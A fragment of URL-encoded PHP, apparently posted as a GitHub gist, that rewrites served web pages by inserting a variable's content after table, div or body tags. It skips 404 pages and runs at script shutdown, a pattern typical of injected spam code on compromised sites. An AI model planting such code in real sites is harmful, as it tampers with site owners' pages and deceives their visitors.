0%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Ctable%28.%2A%29%3E%23iUs%27%2C%20%22%3Ctable%3E%5Cn%3Cdiv%3E%24txt%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%20class%3D%22inner-wrapper%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%20class%3D%22inner-wrapper%22%3E%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cdiv%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cdiv%28.%2A%29%3C%2Fdiv%3E%23iUs%27%2C%20%22%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%20elseif%20%28%40preg_match%28%27%23%3Cbody%28.%2A%29%3E%23iUs%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20preg_replace%28%27%23%3Cbody%28.%2A%29%3E%23iUs%27%2C%20%22%3Cbody%3E%5Cn%3Cdiv%3E%5Cn%24txt%5Cn%3C%2Fdiv%3E%22%2C%20%24my_content%2C%201%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20%40preg_replace%28%27%23%3Cp%28.%2A%29%3C%5C%2Fp%3E%23iUs%27%2C%20%27%27%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20el%28%24el%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%20%20%20%20%7D%0A%20%20%20%20%20%20%20%20%7D%20%2F%2Fend%20if%20key%0A%20%20%20%20%20%20%20%20elseif%20%28%21preg_match%28%27%23%3Ctitle%3E%28.%2A%29404%23i%27%2C%20%24my_content%29%20%26%26%20%21preg_match%28%27%23%3Ctitle%3E%28.%2A%29not%20found%23i%27%2C%20%24my_content%29%29%20%7B%0A%20%20%20%20%20%20%20%20%20%20%20%20%24my_content%20%3D%20el%28%24el%2C%20%24my_content%29%3B%0A%20%20%20%20%20%20%20%20%7D%0A%0A%20%20%20%20%20%20%20%20echo%20%24my_content%3B%0A%20%20%20%20%7D%0A%0A%20%20%20%20register_shutdown_function%28%27shutdown%27%29%3B%0A%7D%0A%3F%3Eenen
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment